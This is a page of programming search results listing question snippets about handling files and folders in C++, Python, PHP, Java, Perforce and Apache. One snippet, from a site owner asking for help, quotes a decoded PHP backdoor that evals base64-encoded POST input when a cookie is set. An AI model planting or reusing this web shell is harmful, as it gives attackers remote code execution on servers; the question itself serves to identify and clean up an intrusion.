Search Results

Search found 46908 results on 1877 pages for 'managing files and folder'.

Page 261/1877 | < Previous Page | 257 258 259 260 261 262 263 264 265 266 267 268  | Next Page >

  • Elegant way of parsing Data files for Simulation

    - by sc_ray
    I am working on this project where I need to read in a lot of data from .dat files and use the data to perform simulations. The data in my .dat file looks as follows: DeviceID InteractingDeviceID InteractionStartTime InteractionEndTime 1 2 1101 1105 1,2 1101 and 1105 are tab delimited and it means Device 1 interacted with Device 2 at 1101 ms and ended the interaction at 1105ms. I have a trace data sets that compile thousands of such interactions and my job is to analyze these interactions. The first step is to parse the file. The language of choice is C++. The approach I was thinking of taking was to read the file, for every line that's read create a Device Object. This Device object will contain the property DeviceId and an array/vector of structs, that will contain a list of all the devices the given DeviceId interacted with over the course of the simulation.The struct will contain the Interacting Device Id, Interaction Start Time and Interaction End Time. I have a two fold question here: Is my approach correct? If I am on the right track, how do I rapidly parse these tab delimited data files and create Device objects without excessive memory overhead using C++? A push in the right direction will be much appreciated. Thanks

    Read the article

  • Branch view for a file that has been split into multiple files

    - by ScottJ
    I have a large source file in Perforce that has been split up into several smaller files in a branch. I want to create a branch view that can handle this, but perforce (2009.1) only sees the last of the multiple files. For example, I created: p4 integrate //depot/original/huge_file.c //depot/new/huge_file.c Later I split the huge file into smaller ones: p4 integrate //depot/new/huge_file.c //depot/new/small_file_one.c p4 integrate //depot/new/huge_file.c //depot/new/small_file_two.c p4 integrate //depot/new/huge_file.c //depot/new/small_file_three.c Then edit each of those (including //depot/new/huge_file.c) and submit. Now I make changes to //depot/original/huge_file.c and I want to integrate those changes to //depot/new. If I do this manually, it works fine: p4 integrate //depot/original/huge_file.c //depot/new/huge_file.c p4 integrate //depot/original/huge_file.c //depot/new/small_file_one.c p4 integrate //depot/original/huge_file.c //depot/new/small_file_two.c p4 integrate //depot/original/huge_file.c //depot/new/small_file_three.c But I don't want to do that every time I integrate -- this kind of thing belongs in a branch view. Unfortunately if the branch view includes the same source file multiple times, the subsequent lines override the earlier ones. How can I create a branch view like this: //depot/original/huge_file.c //depot/new/huge_file.c //depot/original/huge_file.c //depot/new/small_file_one.c //depot/original/huge_file.c //depot/new/small_file_two.c //depot/original/huge_file.c //depot/new/small_file_three.c When I integrate using this branch spec, I get only small_file_three.c integrated.

    Read the article

  • Python: Most efficient way to concatenate and rearrange files

    - by user300890
    Hi, I am reading from several files, each file is divided into 2 pieces, first a header section of a few thousand lines followed by a body of a few thousand. My problem is I need to concatenate these files into one file where all the headers are on the top followed by the body. Currently I am using two loops; one to pull out all the headers and write them, and the second to write the body of each file (I also include a tmp_count variable to limit the number of lines to be loading into memory before dumping to file). This is pretty slow - about 6min for 13gb file. Can anyone tell me how to optimize this or if there is a faster way to do this in python ? Thanks! Here is my code: def cat_files_sam(final_file_name,work_directory_master,file_count): final_file = open(final_file_name,"w") if len(file_count) > 1: file_count=sort_output_files(file_count) # only for @ headers for bowtie_file in file_count: #print bowtie_file tmp_list = [] tmp_count = 0 for line in open(os.path.join(work_directory_master,bowtie_file)): if line.startswith("@"): if tmp_count == 1000000: final_file.writelines(tmp_list) tmp_list = [] tmp_count = 0 tmp_list.append(line) tmp_count += 1 else: final_file.writelines(tmp_list) break for bowtie_file in file_count: #print bowtie_file tmp_list = [] tmp_count = 0 for line in open(os.path.join(work_directory_master,bowtie_file)): if line.startswith("@"): continue if tmp_count == 1000000: final_file.writelines(tmp_list) tmp_list = [] tmp_count = 0 tmp_list.append(line) tmp_count += 1 final_file.writelines(tmp_list) final_file.close()

    Read the article

  • Sharing runtime variables between files

    - by nightcracker
    I have a project with a few files that all include the header global.hpp. Those files want to share and update information that is relevant for the whole program during runtime (that data is gathered progressively during the program runs but the fields of data are known at compile-time). Now my idea was to use a struct like this: global.hpp #include <string> #ifndef _GLOBAL_SESSION_STRUCT #define _GLOBAL_SESSION_STRUCT struct session_struct { std::string username; std::string password; std::string hostname; unsigned short port; // more data fields as needed }; #endif extern struct session_struct session; main.cpp #include "global.hpp" struct session_struct session; int main(int argc, char* argv[]) { session.username = "user"; session.password = "secret"; session.hostname = "example.com"; session.port = 80; // other stuff, etc return 0; } Now every file that includes global.hpp can just read & write the fields of the session struct and easily share information. Is this the correct way to do this? NOTE: For this specific project no threading is used. But please (for future projects and other people reading) clarify in your answer how this (or your proposed) solution works when threaded. Also, for this example/project session variables are shared. But this should also apply to any other form of shared variables.

    Read the article

  • Working with datetime type in Quickbooks My Time files

    - by jakemcgraw
    I'm attempting to process Quickbooks My Time imt files using PHP. The imt file is a plaintext XML file. I've been able to use the PHP SimpleXML library with no issues but one: The numeric representations of datetime in the My Time XML files is something I've never seen before: <object type="TIMEPERIOD" id="z128"> <attribute name="notes" type="string"></attribute> <attribute name="start" type="date">308073428.00000000000000000000</attribute> <attribute name="running" type="bool">0</attribute> <attribute name="duration" type="double">3600</attribute> <attribute name="datesubmitted" type="date">310526237.59616601467132568359</attribute> <relationship name="activity" type="1/1" destination="ACTIVITY" idrefs="z130"></relationship> </object> You can see that attritube[@name='start'] has a value of: 308073428.00000000000000000000 This is not Excel based method of storage 308,073,428 is too many days since 1900-01-00 and it isn't Unix Epoch either. So, my question is, has anyone ever seen this type of datetime representation?

    Read the article

  • Apache is looking for htaccess and htpasswd files that aren't there

    - by user1094092
    Having an issue where Apache is requesting authentication, and looking for an .htpasswd file, based on instructions from an .htaccess file that's no longer in DocumentRoot. Background: In my DocumentRoot, I'd previously copied an .htaccess and .htpasswd file from another machine (along with all of the other website files). .htaccess contents: AuthType Basic AuthName "Password is required" AuthUserFile /some/directory/that/was/on/the/other/server/not/this/one/.htpasswd Require valid-user Here's the catch: I moved .htaccess and .htpasswd out of DocumentRoot and even renamed the files. There is no longer an .htaccess file in DocumentRoot at all. But, when I try to access localhost from a browser, I am prompted to enter the login and password. When I enter the login and password (from the old, not-in-DocumentRoot .hpasswd file), I get a 500 Internal Server error and the log shows: [error] [client 127.0.0.1] (2)No such file or directory: Could not open password file: /some/directory/that/was/on/the/other/server/not/this/one/.htpasswd This has been quite a puzzle, because there's no longer a .htaccess or .htpasswd file anywhere in DocumentRoot !! Have tried several apache restarts and also tried using a blank .htaccess file in the DocumentRoot. Even grepped the entire machine for references to AuthType Basic to see if I missed anything. httpd.conf looks normal enough...I can post that if needed, but this question seems long enough as it is :) Thanks for any assistance you can provide

    Read the article

  • List files with two dots in their names using java regular expressions

    - by Nivas
    I was trying to match files in a directory that had two dots in their name, something like theme.default.properties I thought the pattern .\\..\\.. should be the required pattern [. matches any character and \. matches a dot] but it matches both oneTwo.txt and theme.default.properties I tried the following: [resources/themes has two files oneTwo.txt and theme.default.properties] 1. public static void loadThemes() { File themeDirectory = new File("resources/themes"); if(themeDirectory.exists()) { File[] themeFiles = themeDirectory.listFiles(); for(File themeFile : themeFiles) { if(themeFile.getName().matches(".\\..\\..")); { System.out.println(themeFile.getName()); } } } } This prints nothing and the following File[] themeFiles = themeDirectory.listFiles(new FilenameFilter() { public boolean accept(File dir, String name) { return name.matches(".\\..\\.."); } }); for (File file : themeFiles) { System.out.println(file.getName()); } prints both oneTwo.txt theme.default.properties I am unable to find why these two give different results and which pattern I should be using to match two dots... Can someone help?

    Read the article

  • starting a windows executable via batch script, exe not in Program Files

    - by Anthony
    This is probably batch scripting 101, but I can't find any clear explanation/documentation on why this is happening or if my workaround is actually the solution. So basically any terminology or links to good sources is really appreciated. So I have a program I want to execute via batch script (along with several other programs). It's the only one where the exe is not in a Program Files folder. I can get it to start like this: C:\WeirdProgram\WeirdProgramModule\weirdmodule.exe But I get an error along the lines of: Run-time Error '3024': Could not find file C:\Users\MyUserName\Desktop\ModuleSettings.mdb So it seems that the program is looking for its settings files from the same location that the batch script starts up. Given that I finally got everything to work by doing the following: cd C:\WeirdProgram\WeirdProgramModule\ weirdmodule.exe That works fine, and it's not the end of the world to have to go this route (just one extra line), but I've convinced myself that I'm doing something wrong based on lack of basic understanding. Anybody know or can point me to why it works this way? Oh, and doing the following: start "C:\WeirdProgram\WeirdProgramModule\weirdmodule.exe" doesn't do anything at all. Thanks,

    Read the article

  • sort files by date in PHP

    - by sasori
    hi, I currently have an index.php file which allows me to output the list of files inside the same directory, the output shows the names then I used filemtime() function to show the date when the file was modified. my problem now is, how will I sort the output to show the latest modified file ?, I've been thinking for awhile how to do this. if only I am doing it with mysql interaction there will be no problem at all. please show me an example how to sort and output the list of files starting from the latest modified one. this is what i have for now if ($handle = opendir('.')) { while (false !== ($file = readdir($handle))) { if ($file != "." && $file != "..") { $lastModified = date('F d Y, H:i:s',filemtime($file)); if(strlen($file)-strpos($file,".swf")== 4){ echo "<tr><td><input type=\"checkbox\" name=\"box[]\"></td><td><a href=\"$file\" target=\"_blank\">$file</a></td><td>$lastModified</td></tr>"; } } } closedir($handle); }

    Read the article

  • PHP hack files found - help decoding and identifying

    - by akc
    I found a handful of hack files on our web server. I managed to de-obfuscate them a bit -- they all seem to have a part that decodes into a chunk that looks like: if (!empty($_COOKIE['v']) and $_COOKIE['v']=='d'){if (!empty($_POST['c'])) {echo '<textarea rows=28 cols=80>'; $d=base64_decode(str_replace(' ','+',$_POST['c']));if($d) @eval($d); echo '</textarea>';}echo '<form action="" method=post><textarea cols=80 rows=28 name=c></textarea><br><input type=submit></form>';exit;} But this chunk (decoded above) is usually embedded into a larger code snippet. I've shared the code of one of the files in its entirety here: http://pastie.org/3753704 I can sort of see where this code is going, but definitely not an expert at PHP and could use some help figuring out more specifically what it's doing or enabling. Also, if anyone happens to be familiar with this hack, any information on how it works, and where the backdoor and other components of the hack may be hidden would be super helpful and greatly appreciated. I tried to Google parts of the code, to see if others have reported it, but only came up with this link: http://www.daniweb.com/web-development/php/threads/365059/hacked-joomla Thanks!

    Read the article

  • RewriteRule to store thousands of files in subdirectories

    - by Brandon
    I have a website that will have millions of pages in a directory. I'd like to store those files on-disk in a bunch of subdirectories based on the first characters of the page name. For example http://mysite.com/hugedir/somefile.html would be stored in /var/www/html/hugedir/s/o/m/e/f/ile.html That is fairly trivial to do with a RewriteRule like so: RewriteRule ^hugedir/(.)(.)(.)(.)(.)(.*).html /hugedir/{$1}/{$2}/{$3}/{$4}/{$5}/$6.html RewriteRule ^hugedir/(.)(.)(.)(.)(.*).html /hugedir/{$1}/{$2}/{$3}/{$4}/{$5}.html RewriteRule ^hugedir/(.)(.)(.)(.*).html /hugedir/{$1}/{$2}/{$3}/{$4}.html RewriteRule ^hugedir/(.)(.)(.*).html /hugedir/{$1}/{$2}/{$3}.html RewriteRule ^hugedir/(.)(.*).html /hugedir/{$1}/{$2}.html RewriteRule ^hugedir/(.*).html /hugedir/{$1}.html However, the file name may contain hyphens or other non-standard characters and I'd really like to avoid having a directory named with a strange character. Ideally, I'd like to have a list of 'approved' characters and either eliminate or transform the unapproved characters to an underscore. Can anybody think of a way to do that? Or something else equivalent? Part of the requirement is that these be physical files on disk and it not be parsed with a scripting language.

    Read the article

  • What files does JDIC need to run?

    - by Domchi
    I'm trying to call JDIC from my application, but I can't get it to run. What files do I need and where? From what I've been able to gather from their site, I basically need to put jdic.jar in classpath... however there is also a lib folder with jdic.jar with a bit different size, and jdic_native_applet.jar, jdic_stub_unix.jar, jdic_stub_windows.jar and several folders with what I gather are platform specific files. I get this exception when instantiating AssociationService: java.lang.ClassNotFoundException: org.jdesktop.jdic.filetypes.internal.AppAssociationReaderFactory_windows at java.net.URLClassLoader$1.run(URLClassLoader.java:200) at java.security.AccessController.doPrivileged(Native Method) at java.net.URLClassLoader.findClass(URLClassLoader.java:188) at java.lang.ClassLoader.loadClass(ClassLoader.java:307) at sun.misc.Launcher$AppClassLoader.loadClass(Launcher.java:301) at java.lang.ClassLoader.loadClass(ClassLoader.java:252) at org.jdesktop.jdic.filetypes.AssociationService.<init>(Unknown Source) at QuickTest.main(QuickTest.java:101) I've tried last "official" release and last alpha release. I'm running Java 6 and Win7 64bit. Does JDIC even work under Win7 (or 64bit, although I use 32bit Java)? I see no release after 2006, and no activity in the project after about 2008... while Win7 came in 2009. I know that parts of JDIC, like Desktop, were included in Java 6, however that doesn't seem to be the case with file associations. And if it doesn't, are there any (hopefully cross-platform) alternatives for managing file associations? There are some things for Windows only that I tried, but that requires running native commands with administrator privileges which I don't know how to pull, apart from asking user to run my app as administrator and then use Runtime.exec()... If there are no alternatives to JDIC, I'm interested if anyone has managed to handle file associations well with cross-platform installers?

    Read the article

  • C# comparing two files regex problem.

    - by Mike
    Hi everyone, what I'm trying to do is open a huge list of files (about 40k records, and match them on a line in a file that contains 2 millions records. And if my line from file A matches a line in file B write out that line. File A contains a bunch of files without extensions and file B contains full file paths including extensions. i'm using this but i cant get it to go... string alphaFilePath = (@"C:\Documents and Settings\g\Desktop\Arrp\Find\natst_ready.txt"); List<string> alphaFileContent = new List<string>(); using (FileStream fs = new FileStream(alphaFilePath, FileMode.Open)) using (StreamReader rdr = new StreamReader(fs)) { while (!rdr.EndOfStream) { alphaFileContent.Add(rdr.ReadLine()); } } string betaFilePath = @"C:\Documents and Settings\g\Desktop\Arryup\Find\eble.txt"; StringBuilder sb = new StringBuilder(); using (FileStream fs = new FileStream(betaFilePath, FileMode.Open)) using (StreamReader rdr = new StreamReader(fs)) { while (!rdr.EndOfStream) { string betaFileLine = rdr.ReadLine(); string matchup = Regex.Match(alphaFileContent, @"(\\)(\\)(\\)(\\)(\\)(\\)(\\)(\\)(.*)(\.)").Groups[9].Value; if (alphaFileContent.Equals(matchup)) { File.AppendAllText(@"C:\array_tech.txt", betaFileLine); } } } This doesnt work because the alphafilecontent is a single line only and i'm having a hard time figuring out how to get my regex to work on the file that contains all the file paths (Betafilepath) here is a sample of the beta file path. C:\arres_i\Grn\Ora\SEC\DBZ_EX1\Nes\001\DZO-EX00001.txt Here is the line i'm trying to compare from my alpha DZO-EX00001

    Read the article

  • How to rename many files url escaped (%XX) to human readable form

    - by F. Hauri
    I have downloaded a lot of files in one directory, but many of them are stored with URL escaped filename, containing sign percents folowed by two hexadecimal chars, like: ls -ltr $HOME/Downloads/ -rw-r--r-- 2 user user 13171425 24 nov 10:07 Swisscom%20Mobile%20Unlimited%20Kurzanleitung-%282011-05-12%29.pdf -rw-r--r-- 2 user user 1525794 24 nov 10:08 31010ENY-HUAWEI%20E173u-1%20HSPA%20USB%20Stick%20Quick%20Start-%28V100R001_01%2CEnglish%2CIndia-Reliance%2CC%2Ccolor%29.pdf ... All theses names match the following form whith exactly 3 parts: Name of the object -( Revision, and/or Date, useless ... ). Extension In same command, I would like to obtain unde My goal is to having one command to rename all this files to obtain: -rw-r--r-- 2 user user 13171425 24 nov 10:07 Swisscom_Mobile_Unlimited_Kurzanleitung.pdf -rw-r--r-- 2 user user 1525794 24 nov 10:08 31010ENY-HUAWEI_E173u-1_HSPA_USB_Stick_Quick_Start.pdf I've successfully do the job in full bash with: urlunescape() { local srce="$1" done=false part1 newname ext while ! $done ;do part1="${srce%%%*}" newname="$part1\\x${srce:${#part1}+1:2}${srce:${#part1}+3}" [ "$part1" == "$srce" ] && done=true || srce="$newname" done newname="$(echo -e $srce)" ext=${newname##*.} newname="${newname%-(*}" echo ${newname// /_}.$ext } for file in *;do mv -i "$file" "$(urlunescape "$file")" done ls -ltr -rw-r--r-- 2 user user 13171425 24 nov 10:07 Swisscom_Mobile_Unlimited_Kurzanleitung.pdf -rw-r--r-- 2 user user 1525794 24 nov 10:08 31010ENY-HUAWEI_E173u-1_HSPA_USB_Stick_Quick_Start.pdf or using sed, tr, bash ... and sed: for file in *;do echo -e $( echo $file | sed 's/%\(..\)/\\x\1/g' ) | sed 's/-(.*\.\([^\.]*\)$/.\1/' | tr \ \\n _\\0 | xargs -0 mv -i "$file" done ls -ltr -rw-r--r-- 2 user user 13171425 24 nov 10:07 Swisscom_Mobile_Unlimited_Kurzanleitung.pdf -rw-r--r-- 2 user user 1525794 24 nov 10:08 31010ENY-HUAWEI_E173u-1_HSPA_USB_Stick_Quick_Start.pdf But, I'm sure, there must exist simplier and/or shorter way to do this.

    Read the article

  • Problems installing a package from PyPI: root files not installed

    - by intuited
    After installing the BitTorrent-bencode package, either via easy_install BitTorrent-bencode or pip install BitTorrent-bencode, or by downloading the tarball and installing that via easy_install $tarball, I discover that /usr/local/lib/python2.6/dist-packages/BitTorrent_bencode-5.0.8-py2.6.egg/ contains EGG-INFO/ and test/ directories. Although both of these subdirectories contain files, there are no files in the BitTorr* directory itself. The tarball does contain bencode.py, which is meant to be the actual source for this package, but it's not installed by either of those utils. I'm pretty new to all of this so I'm not sure if this is a problem with the package or with what I'm doing. The package was packaged a while ago (2007), so perhaps it's using some deprecated configuration aspect that I need to supply a command-line flag for. I'm more interested in learning what's wrong with either the package or my procedures than in getting this particular package installed; there is another package called hunnyb that seems to do a decent enough job of decoding bencoded data. Mostly I'd like to know how to deal with such problems in other packages.

    Read the article

  • transferring binary files between systems

    - by tim
    Hi guys I'm trying to transfer my files between 2 UNIX clusters, the data is pure numeric (vectors of double) in binary form. Unfortunately one of the systems is IBM ppc997 and the other is AMD Opteron, It seems the format of binary numbers in these systems are different. I have tried 3 ways till now: 1- Changed my files to ASCII format (i.e. saved a number at each line in a text file), sent them to the destination and changed them again to binary on the target system (they both are UNIX, no end of line character difference??!) 2- Sent pure binaries to the destination 3- used uuencode sent them to the destination and decoded them Unfortunately any of these methods does not work (my code in the destination system generates garbage, while it works on the first system, I'm 100% sure the code itself is portable). I don't know what else I can do? Do you have any idea? I'm not a professional, please don't use computer scientists terminology! And: my codes are in C, so by binary I mean a one to one mapping between memory and hard disk. Thanks

    Read the article

  • mod_rewrite: no access to real files and directories

    - by tshabalala
    Hello. I use mod_rewrite/.htaccess for pretty URLs. I forward all the requests to my index.php, like this: RewriteRule ^/?([a-zA-Z0-9/-]+)/?$ /index.php [NC,L] The index.php then handles the requests. I'm also using this condition/rule to eliminate trailing slashes (or rather rewrite them to the URL without a trailing slash, with a 301 redirect; I'm doing this to avoid duplicate content and because I like no trailing slashes better): RewriteCond %{HTTP_HOST} !^\.localhost$ [NC] RewriteRule ^(.+)/$ http://%{HTTP_HOST}/$1 [R=301,L] This works well, except that I now get an infinite loop when trying to access a (real) directory (the rewrite rule removes the trailing slash, the server adds it again, ...). I solved this by setting the DirectorySlash directive to Off: DirectorySlash Off I don't know how good this solution is, I don't feel too confident about it tbh. Anyway, what I'd like to do is completely ignore "real" files and directories, since I don't need them and I only use pretty URLs with "virtual" files/directories anyway. This would allow me to avoid the DirectorySlash workaround/hack too. Is this possible? Thanks!

    Read the article

  • PHP transfer files from server to server in LAN

    - by cheapez
    So, I have 5-6 pages of requirements. I'm trying to build this application in PHP based on the requirements. I want to transfer files from one server to the other server in LAN, and then send a shell command to the other server to find out if the file has been transferred successfully. In php, I can transfer files using FTP, and send shell commands using SSH. Using the methods above, I will need to open connection to the server first, but I don't know the ftp server name, domain name, ip address, or anything like that. I only know the the server ID (I'm not sure what this ID is, but I guess it is like the computer's name). An example of the server ID is: "c23bap234" How do I open a connection with just that server ID? These servers are in the same building, have LAN connection, don't have connection to the outside world. These machines have PHP, Apache, ... installed. If my post doesn't make sense to you, it's because I'm a learner. I hope someone can help me on this. Thanks in advance.

    Read the article

  • Combine MD5 hashes of multiple files

    - by user685869
    I have 7 files that I'm generating MD5 hashes for. The hashes are used to ensure that a remote copy of the data store is identical to the local copy. Unfortunately, the link between these two copies of the data is mind numbingly slow. Changes to the data are very rare but I have a requirement that the data be synchronized at all times (or as soon as possible). Rather than passing 7 different MD5 hashes across my (extremely slow) communications link, I'd like to generate the hash for each file and then combine these hashes into a single hash which I can then transfer and then re-calculate/use for comparison on the remote side. If the "combined hash" differs, then I'd start sending the 7 individual hashes to determine exactly which file(s) have been changed. For example, here are the MD5 hashes for the 7 files as of last week: 0709d609d69385255c496436eb50402c 709465a74411bd596595c7b9b158ae6a 4ab657320ef33e3d5eb498e4c13d41b7 3b49c6ab199994fd776bb63761414e72 0fc28c5a010fc3c06c0c930c88e31a15 c4ecd214662cac5aae0e53f6f252bf0e 8b086431e43148a2c2d943ba30d31cc6 I'd like to combine these hashes together such that I get a single unique value (perhaps another MD5 hash?) that I can then send to the remote system. On the remote system, I'd then perform the same calculation to determine if the data as a whole has been changed. If it has, then I'd start sending the individual hashes, etc. The most important factor is that my "combined hash" be short enough so that it uses less bandwidth than just sending all 7 hashes in the first place. I thought of writing the 7 MD5 hashes to a file and then hashing that file but is there a better way?

    Read the article

  • Merging multiple docx files to one

    - by coding
    I am developing a desktop application in C#. I have coded a function to merge multiple docx files but it does not work as expected. I don't get the content exactly as how it was in the source files. A few blank lines are added in between. The content extends to the next pages, header and footer information is lost, page margins gets changed, etc.. How can I concatenate docs as it is without and change in it.Any suggestions will be helpful. This is my code. public bool CombineDocx(string[] filesToMerge, string destFilepath) { Application wordApp = null; Document wordDoc = null; object outputFile = destFilepath; object missing = Type.Missing; object pageBreak = WdBreakType.wdPageBreak; try { wordApp = new Application { DisplayAlerts = WdAlertLevel.wdAlertsNone, Visible = false }; wordDoc = wordApp.Documents.Add(ref missing, ref missing, ref missing, ref missing); Selection selection = wordApp.Selection; foreach (string file in filesToMerge) { selection.InsertFile(file, ref missing, ref missing, ref missing, ref missing); selection.InsertBreak(ref pageBreak); } wordDoc.SaveAs( ref outputFile, ref missing, ref missing, ref missing, ref missing, ref missing, ref missing, ref missing, ref missing, ref missing, ref missing, ref missing, ref missing, ref missing, ref missing, ref missing); return true; } catch (Exception ex) { Msg.Log(ex); return false; } finally { if (wordDoc != null) { wordDoc.Close(); } if (wordApp != null) { wordApp.DisplayAlerts = WdAlertLevel.wdAlertsAll; wordApp.Quit(); Marshal.FinalReleaseComObject(wordApp); } } }

    Read the article

  • asset_packing tiny_mce files

    - by haries
    I use inplacericheditor plugin and tiny_mce Before asset_packager usage, this is how I include the files and they work well <script src="/javascripts/patch_inplaceeditor_1-8-2.js" type="text/javascript"> </script> <script src="/javascripts/patch_inplaceeditor_editonblank_1-8-2.js" type="text/javascript" </script> <script src="/javascripts/tiny_mce/tiny_mce.js" type="text/javascript"></script> <script src="/javascripts/tiny_mce_init.js" type="text/javascript"></script> <script src="/javascripts/inplacericheditor.js" type="text/javascript"></script> My asset_packager.yml section looks like this for the above files: tinyeditor: patch_inplaceeditor_1-8-2 patch_inplaceeditor_editonblank_1-8-2 tiny_mce/tiny_mce tiny_mce_init tiny_mce/langs/en tiny_mce/themes/advanced/editor_template tiny_mce/themes/advanced/langs/en tiny_mce/plugins/save/editor_plugin tiny_mce/plugins/autoresize/editor_plugin tiny_mce/plugins/paste/editor_plugin tiny_mce/plugins/preview/editor_plugin tiny_mce/plugins/table/editor_plugin tiny_mce/plugins/contextmenu/editor_plugin tiny_mce/plugins/emotions/editor_plugin inplacericheditor When I include the asset_packaged file and load the page (in production) I get the following errors: "Ajax.InPlaceEditor is undefined" "Ajax.InPlaceRichEditor is not a constructor" Can anyone shed some light on where I am going wrong or share a better way to asset_package tinymce? Thanks!

    Read the article

  • C++ reading and writing and writing files

    - by user320950
    Write a program that processes a list of items purchased with a receipt List in itemlist.txt just items different numbers Prices in pricelist.txt have items and prices in them, different # Make file output file that has receipt Print message saying program ran- have not done If item not in pricelist, report error, count errors display at end Don't know how many items or prices Close file and clear because of running many these files many times This program wont write to the files like so the above is what i have to do #include<iostream>`enter code here` #include<fstream> #include<cstdlib> #include<iomanip> using namespace std; int main() { ifstream in_stream; // reads itemlist.txt ofstream out_stream1; // writes in items.txt ifstream in_stream2; // reads pricelist.txt ofstream out_stream3;// writes in plist.txt ifstream in_stream4;// read recipt.txt ofstream out_stream5;// write display.txt double price=' ',curr_total=0.0; int wrong=0; int itemnum=' '; char next; in_stream.open("ITEMLIST.txt", ios::in); // list of avaliable items out_stream1.open("listWititems.txt", ios::out); // list of avaliable items in_stream2.open("PRICELIST.txt", ios::in); out_stream3.open("listWitdollars.txt", ios::out); in_stream4.open("display.txt", ios::in); out_stream5.open("showitems.txt", ios::out); in_stream.setf(ios::fixed); while(!in_stream.eof()) { in_stream >> itemnum; cin.clear(); cin >> next; } out_stream1.setf(ios::fixed); while (!out_stream1.eof()) { out_stream1 << itemnum; cin.clear(); cin >> next; } in_stream2.setf(ios::fixed); in_stream2.setf(ios::showpoint); in_stream2.precision(2); while (!in_stream2.eof()) // reads file to end of file { while((price== (price*1.00)) && (itemnum == (itemnum*1))) { in_stream2 >> itemnum >> price; itemnum++; price++; curr_total= price++; in_stream2 >> curr_total; cin.clear(); // allows more reading cin >> next; return itemnum, price; } } out_stream3.setf(ios::fixed); out_stream3.setf(ios::showpoint); out_stream3.precision(2); while (!out_stream3.eof()) // reads file to end of file { while((price== (price*1.00)) && (itemnum == (itemnum*1))) { out_stream3 << itemnum << price; itemnum++; price++; curr_total= price++; out_stream3 << curr_total; cin.clear(); // allows more reading cin >> next; return itemnum, price; } } in_stream4.setf(ios::fixed); in_stream4.setf(ios::showpoint); in_stream4.precision(2); while (!in_stream4.eof()) { in_stream4 >> itemnum >> price >> curr_total; cin.clear(); cin >> next; } out_stream5.setf(ios::fixed); out_stream5.setf(ios::showpoint); out_stream5.precision(2); out_stream5 <<setw(5)<< " itemnum " <<setw(5)<<" price "<<setw(5)<<" curr_total " <<endl; // sends items and prices to receipt.txt out_stream5 << setw(5) << itemnum << setw(5) <<price << setw(5)<< curr_total; // sends items and prices to receipt.txt out_stream5 << " You have a total of " << wrong++ << " errors " << endl; in_stream.close(); // closing files. out_stream1.close(); in_stream2.close(); out_stream3.close(); in_stream4.close(); out_stream5.close(); system("pause"); }

    Read the article

  • Sending the files (At least 11 files) from folder through web service to android app.

    - by Shashank_Itmaster
    Hello All, I stuck in middle of this situation,Please help me out. My question is that I want to send files (Total 11 PDF Files) to android app using web service. I tried it with below code.Main Class from which web service is created public class MultipleFilesImpl implements MultipleFiles { public FileData[] sendPDFs() { FileData fileData = null; // List<FileData> filesDetails = new ArrayList<FileData>(); File fileFolder = new File( "C:/eclipse/workspace/AIPWebService/src/pdfs/"); // File fileTwo = new File( // "C:/eclipse/workspace/AIPWebService/src/simple.pdf"); File sendFiles[] = fileFolder.listFiles(); // sendFiles[0] = fileOne; // sendFiles[1] = fileTwo; DataHandler handler = null; char[] readLine = null; byte[] data = null; int offset = 0; int numRead = 0; InputStream stream = null; FileOutputStream outputStream = null; FileData[] filesData = null; try { System.out.println("Web Service Called Successfully"); for (int i = 0; i < sendFiles.length; i++) { handler = new DataHandler(new FileDataSource(sendFiles[i])); fileData = new FileData(); data = new byte[(int) sendFiles[i].length()]; stream = handler.getInputStream(); while (offset < data.length && (numRead = stream.read(data, offset, data.length - offset)) >= 0) { offset += numRead; } readLine = Base64Coder.encode(data); offset = 0; numRead = 0; System.out.println("'Reading File............................"); System.out.println("\n"); System.out.println(readLine); System.out.println("Data Reading Successful"); fileData.setFileName(sendFiles[i].getName()); fileData.setFileData(String.valueOf(readLine)); readLine = null; System.out.println("Data from bean " + fileData.getFileData()); outputStream = new FileOutputStream("D:/" + sendFiles[i].getName()); outputStream.write(Base64Coder.decode(fileData.getFileData())); outputStream.flush(); outputStream.close(); stream.close(); // FileData fileDetails = new FileData(); // fileDetails = fileData; // filesDetails.add(fileData); filesData = new FileData[(int) sendFiles[i].length()]; } // return fileData; } catch (FileNotFoundException e) { e.printStackTrace(); } catch (IOException e) { e.printStackTrace(); } catch (Exception e) { e.printStackTrace(); } return filesData; } } Also The Interface MultipleFiles:- public interface MultipleFiles extends Remote { public FileData[] sendPDFs() throws FileNotFoundException, IOException, Exception; } Here I am sending an array of bean "File Data",having properties viz. FileData & FileName. FileData- contains file data in encoded. FileName- encoded file name. The Bean:- (FileData) public class FileData { private String fileName; private String fileData; public String getFileName() { return fileName; } public void setFileName(String fileName) { this.fileName = fileName; } public String getFileData() { return fileData; } public void setFileData(String string) { this.fileData = string; } } The android DDMS gives out of memory exception when tried below code & when i tried to send two files then only first file is created. public class PDFActivity extends Activity { private final String METHOD_NAME = "sendPDFs"; private final String NAMESPACE = "http://webservice.uks.com/"; private final String SOAP_ACTION = NAMESPACE + METHOD_NAME; private final String URL = "http://192.168.1.123:8080/AIPWebService/services/MultipleFilesImpl"; /** Called when the activity is first created. */ @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.main); TextView textViewOne = (TextView) findViewById(R.id.textViewOne); try { SoapObject soapObject = new SoapObject(NAMESPACE, METHOD_NAME); SoapSerializationEnvelope envelope = new SoapSerializationEnvelope( SoapEnvelope.VER11); envelope.setOutputSoapObject(soapObject); textViewOne.setText("Web Service Started"); AndroidHttpTransport httpTransport = new AndroidHttpTransport(URL); httpTransport.call(SOAP_ACTION, envelope); // SoapObject result = (SoapObject) envelope.getResponse(); Object result = envelope.getResponse(); Log.i("Result", result.toString()); // String fileName = result.getProperty("fileName").toString(); // String fileData = result.getProperty("fileData").toString(); // Log.i("File Name", fileName); // Log.i("File Data", fileData); // File pdfFile = new File(fileName); // FileOutputStream outputStream = // openFileOutput(pdfFile.toString(), // MODE_PRIVATE); // outputStream.write(Base64Coder.decode(fileData)); Log.i("File", "File Created"); // textViewTwo.setText(result); // Object result = envelope.getResponse(); // FileOutputStream outputStream = openFileOutput(name, mode) } catch (Exception e) { e.printStackTrace(); } } } Please help with some explanation or changes in my code. Thanks in Advance.

    Read the article

  • Fastest way to parse XML files in C#?

    - by LifeH2O
